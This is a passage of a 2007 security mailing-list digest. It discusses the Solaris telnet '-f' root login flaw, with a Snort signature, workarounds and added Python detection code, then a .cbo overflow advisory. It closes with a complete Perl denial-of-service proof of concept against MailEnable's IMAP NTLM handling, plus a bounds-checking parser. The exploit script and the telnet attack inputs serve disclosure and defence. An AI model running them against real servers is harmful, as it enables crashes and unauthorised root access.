http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923

2. If you haven't already, I strongly recommend checking your network for
machines running telnet, and more specifically, vulnerable to this
particular issue.

Several folks are speaking of third-party appliances running on Solaris,
as well as some back-end VoIP devices that have been confirmed as
vulnerable.

Apparently, telnet returns a different answer when this vulnerability is
used. We are not sure yet, but Noam Rathaus brought up the option that it
looks like the client responds with a "Won't Authentication Option" to the
server's "Do Authentication Option". This could perhaps be used to
actively detect the "attack".

3. If this solution is viable for you and you haven't already, ACLing
23/tcp at the border or from your user space may not be a bad idea, if it
won't kill anything. At least for now.

4. Bleeding Edge (ex Bleeding Snort) released snort signatures for this:
http://www.bleedingthreats.net/index.php/2007/02/12/solaris-remote-telnet-root-exploit-signature/

Quoting:

Chris Byrd has submitted an accurate signature for the exploit.
# Submitted 2007-02-12 by Chris Byrd
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:"BLEEDING-EDGE EXPLOIT Solaris telnet USER environment vuln"; flow:to_server,established; content:"|ff fa 27 00 00 55 53 45 52 01 2d 66|"; rawbytes; classtype:attempted-user; reference:url,riosec.com/solaris-telnet-0-day; sid:2003411; rev:1;)


4. An analysis of how this vulnerability works can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

And blogs by Sun on how this happened and was fixed (thanks to Georg
Oppenberg):
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
http://blogs.sun.com/danmcd/entry/how_opensolaris_did_its_job

And a fine explanation by Casper Dik on Bugtraq:
http://seclists.org/bugtraq/2007/Feb/0205.html

5. Apparently, this is the same vulnerability in 'login' that was in AIX
in 1994:
http://www.cert.org/advisories/CA-1994-09.html
http://osvdb.org/displayvuln.php?osvdb_id=1007

6. Vulnerable systems: reports are unclear, some or all of Solaris 10. No
earlier versions of Solaris/SunOS are vulnerable.

6. Other workarounds exist. Brad Powell suggested on Full-Disclosure:

Quoting:

For root login; there is a setting in /etc/default/login. If CONSOLE is
set, then root can only login on that device
i.e. "CONSOLE=/dev/ttya" means "root" can only login on ttya device. Any
other user via telnet/ssh/whatever has to login as themselves and "su" to
root.

This doesn't prevent telnet -l "-fbin", or -flp; for those accounts best
bet is to change /etc/passwd for the shell of system-account users to
/sbin/noshell or /bin/false (noshell just logs the entry and exists)

Of course disabling in.telnetd in /etc/inetd.conf (and doing a pkill -HUP
inetd) if possible is a safe bet,
but some sites are forced to use telnetd. 


Background:

The original post on this, with the "exploit", can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

A bit of background:
http://blogs.securiteam.com/index.php/archives/814

And some on how corporations responded as we saw from our own client base:
http://blogs.securiteam.com/index.php/archives/819

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging,
releasing information on the vulnerability, how it happened and why, a
quick beta patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age is going to be with us for a
while.

Gadi Evron.


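
The Bleeding Edge rule quoted above matches the raw bytes of a NEW-ENVIRON suboption carrying USER "-f"; the following added example (not from Bleeding Edge, Sun or anyone on this thread) parses that suboption properly and flags any USER value beginning with "-", which covers HD Moore's point that the bug is not limited to -froot. Both byte streams are constructed samples, not captured traffic.

```python
# Telnet NEW-ENVIRON (RFC 1572) constants. Option 39 is how a telnet client ships
# USER to in.telnetd, which then handed the value to login(1) without checking it.
IAC, SB, SE = 0xFF, 0xFA, 0xF0
OPT_NEW_ENVIRON = 0x27
ENV_IS, ENV_VAR, ENV_VALUE, ENV_USERVAR = 0x00, 0x00, 0x01, 0x03

# Content bytes of the rule above: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f"
BLEEDING_EDGE_CONTENT = (bytes([IAC, SB, OPT_NEW_ENVIRON, ENV_IS, ENV_VAR]) + b"USER"
                         + bytes([ENV_VALUE]) + b"-f")

def new_environ_vars(stream):
    """Return (name, value) pairs from every NEW-ENVIRON IS suboption in a
    client-to-server byte stream. ESC (0x02) escaping is not handled here."""
    pairs, pos = [], 0
    prefix = bytes([IAC, SB, OPT_NEW_ENVIRON, ENV_IS])
    while (start := stream.find(prefix, pos)) >= 0:
        end = stream.find(bytes([IAC, SE]), start)
        if end < 0:
            break                       # unterminated suboption: stop parsing
        name = value = field = None
        for b in stream[start + len(prefix):end]:
            if b in (ENV_VAR, ENV_USERVAR):       # a new variable name starts
                if name is not None:
                    pairs.append((name, value or b""))
                name, value, field = b"", None, "name"
            elif b == ENV_VALUE and name is not None:
                value, field = b"", "value"
            elif field == "name":
                name += bytes([b])
            elif field == "value":
                value += bytes([b])
        if name is not None:
            pairs.append((name, value or b""))
        pos = end + 2
    return pairs

def suspicious_user_vars(stream):
    """USER values beginning with '-': login(1) would read them as options."""
    return [v for n, v in new_environ_vars(stream) if n == b"USER" and v.startswith(b"-")]

def matches_bleeding_edge_sig(stream):
    """Equivalent of the rule's content match, without its flow/port conditions."""
    return BLEEDING_EDGE_CONTENT in stream

# Constructed sample streams (not captured traffic)
BENIGN_STREAM = b"\xff\xfa\x27\x00\x00USER\x01alice\xff\xf0"
ATTACK_STREAM = b"\xff\xfa\x27\x00\x00USER\x01-froot\x00DISPLAY\x01host:0\xff\xf0"

if __name__ == "__main__":
    for label, s in (("benign", BENIGN_STREAM), ("attack", ATTACK_STREAM)):
        print(label, new_environ_vars(s), suspicious_user_vars(s), matches_bleeding_edge_sig(s))
```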


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Joe Shamblin
[EMAIL PROTECTED] wrote:
>> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
 On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
>> Am I missing something?  This vulnerability is close to 10 years old.
>> It was in one of the first versions of Solaris after Sun moved off of
>> the SunOS BSD platform and over to SysV.  It has specifically to do with
>> how arguments are processed via getopt() if I recall correctly.
> You're confused with AIX/Linux
>
> Solaris did not have the -f option in login until much later.
 Hi Casper. While we have you here, any idea on when Sun will be patching
 this issue?
>>> Now, follow the links from http://sunsolve.sun.com/tpatches
>>>
>>> Casper
>>>
>> Many thanks Casper! Can you give some more information on exactly what is
>> patched. Any Sun released advisory?
> 
> 
> The simplest possible fix on such short notice:
> 
> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923
> 
> Casper


How about just uncommenting the following from /etc/default/login

# If CONSOLE is set, root can only login on that device.
# Comment this line out to allow remote login by root.
#
CONSOLE=/dev/console

Not a fix to be sure, but at least prevents a remote login.

Joe
-- 
Joe Shamblin[EMAIL PROTECTED]
Senior Systems Administrator Department of Computer Science
(919) 660-6582  Duke University



Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?

2007-02-14 Thread Gadi Evron
On Tue, 13 Feb 2007, Peter Ferrie wrote:
> > I have to agree with a previous poster and suspect (only 
> > suspect) it could somehow be a backdoor rather than a bug.
> 
> Reminds me of the WMF SetAbortProc() "backdoor" accusation.
> :-) It was just bad design.
> 

You know what? As unlikely as we agreed this is, with WMF, they deserved
the accusation. :o)

Gadi.



[Full-disclosure] MS Interactive Training .cbo Overflow

2007-02-14 Thread Brett Moore

= MS Interactive Training .cbo Overflow
=
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx
=
= Affected Software:
=    Microsoft Windows 2000
=    Microsoft Windows XP
=    Microsoft Windows Server 2003
=
= Public disclosure on February 14, 2007


== Overview ==

When thinking about buffer overflow vulnerabilities, a file can sometimes
be as harmful as a packet. Even though past security issues have taught
us that it is unwise to use a string from a file/packet without first
checking its length, this is what happened here.

MS Interactive Training will open a file with a .cbo extension and read 
in the Syllabus details.

Through the creation of a corrupt file, with a long Syllabus string it is
possible to gain control of EIP and execute arbitrary code.

== Exploitation ==

Remote exploitation through Internet Explorer can be obtained through 
hosting a malicious .cbo file which will be downloaded and opened 
automatically.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft May, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.



[Full-disclosure] MailEnable DoS POC

2007-02-14 Thread mu-b
The POC attached exploits an out of bounds memory read in the NTLM authentication
routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3
function of MENTLM.dll.

This appears to have been silently "patched" somewhere between versions 2.351 and
2.36-7. (observe the quotes).

(c34.dc0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0146b238= ds:0023:8146920b=

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#              Mail Enable Professional v2.33 (win32)
#              Mail Enable Professional v2.34 (win32)
#              Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#

use strict;
use warnings;
use Getopt::Std;
use Socket;
use MIME::Base64;

my %arg;
getopts('t:', \%arg);

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';
my $buf;

if (connect_host($target, $imapd_port)) {
    print("-> * Connected\n");
    # start an NTLM authentication exchange on the IMAP port
    send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
    sleep($send_delay);

    # first (Type 1) message: 12 pad bytes, 0xfffffffa, 12 pad bytes
    $buf = ($PAD x 12).
           "\xfa\xff\xff\xff".
           ($PAD x 12);
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    # third (Type 3) message: 28 pad bytes, then a 16-bit length of 0x0100,
    # two pad bytes and a 32-bit offset of 0xdeadbeef at byte 28
    $buf = ($PAD x 28).
           "\x00\x01".
           ($PAD x 2).
           "\xef\xbe\xad\xde";
    send(SOCKET, encode_base64($buf)."\r\n", 0);
    sleep($send_delay);

    print("-> * Successfully sent payload!\n");
}

sub print_header {
    print("MailEnable Pro <=v2.36 DoS POC\n");
    print("by: <[EMAIL PROTECTED]>\n\n");
}

sub usage {
    print(qq(Usage: $0 -t 

 -t : hostname to test
));

    exit(1);
}

sub connect_host {
    my ($host, $port) = @_;
    my $iaddr = inet_aton($host)           || die("Error: $!\n");
    my $paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
    my $proto = getprotobyname('tcp')      || die("Error: $!\n");

    socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
    connect(SOCKET, $paddr)                      || die("Error: $!\n");
    return(1338);
}
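
The POC's third message places a 16-bit length of 0x0100 and a 32-bit offset of 0xdeadbeef at byte 28, which in the standard NTLMSSP Type 3 layout is the third security buffer. As an added example (not MailEnable's code; how MENTLM.dll lays out its parse is not on the page), here is a Python parser for that layout that bounds-checks every (len, maxlen, offset) triple before copying, together with a constructed message patterned on the POC's bytes.

```python
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NTLM_TYPE3 = 3
# Security-buffer fields of a Type 3 (authenticate) message in wire order: each is an
# 8-byte little-endian (len, maxlen, offset) triple, the first one at byte 12.
TYPE3_FIELDS = ("lm_response", "nt_response", "domain", "user", "workstation", "session_key")
HEADER_LEN = 12 + 8 * len(TYPE3_FIELDS) + 4   # plus a 4-byte negotiate-flags word

def parse_type3(msg):
    """Unpack a Type 3 message, rejecting any buffer that points outside `msg`."""
    if len(msg) < HEADER_LEN or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("truncated header or missing NTLMSSP signature")
    if struct.unpack_from("<I", msg, 8)[0] != NTLM_TYPE3:
        raise ValueError("not a Type 3 message")
    fields = {}
    for i, name in enumerate(TYPE3_FIELDS):
        length, _maxlen, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        if length == 0:
            fields[name] = b""
            continue
        # The check the POC shows missing: len and offset come from the client, so
        # the `length` bytes read from `offset` must lie inside the received message.
        if offset > len(msg) or length > len(msg) - offset:
            raise ValueError(f"{name}: [{offset}, {offset + length}) exceeds {len(msg)}-byte message")
        fields[name] = msg[offset:offset + length]
    return fields

def build_type3(**bufs):
    """Test helper: build a well-formed Type 3 message carrying the given buffers."""
    header = NTLMSSP_SIGNATURE + struct.pack("<I", NTLM_TYPE3)
    payload = b""
    for name in TYPE3_FIELDS:
        data = bufs.get(name, b"")
        header += struct.pack("<HHI", len(data), len(data), HEADER_LEN + len(payload))
        payload += data
    return header + struct.pack("<I", 0) + payload

def poc_like_type3():
    """Constructed after the POC's third send: the buffer at byte 28 (domain) claims
    0x0100 bytes at offset 0xdeadbeef, which a parser without the check above follows."""
    msg = bytearray(build_type3(user=b"alice"))
    struct.pack_into("<HHI", msg, 12 + 8 * TYPE3_FIELDS.index("domain"), 0x0100, 0x4141, 0xDEADBEEF)
    return bytes(msg)

if __name__ == "__main__":
    print(parse_type3(build_type3(domain=b"WORKGROUP", user=b"alice", workstation=b"PC1")))
    try:
        parse_type3(poc_like_type3())
    except ValueError as exc:
        print("rejected:", exc)
```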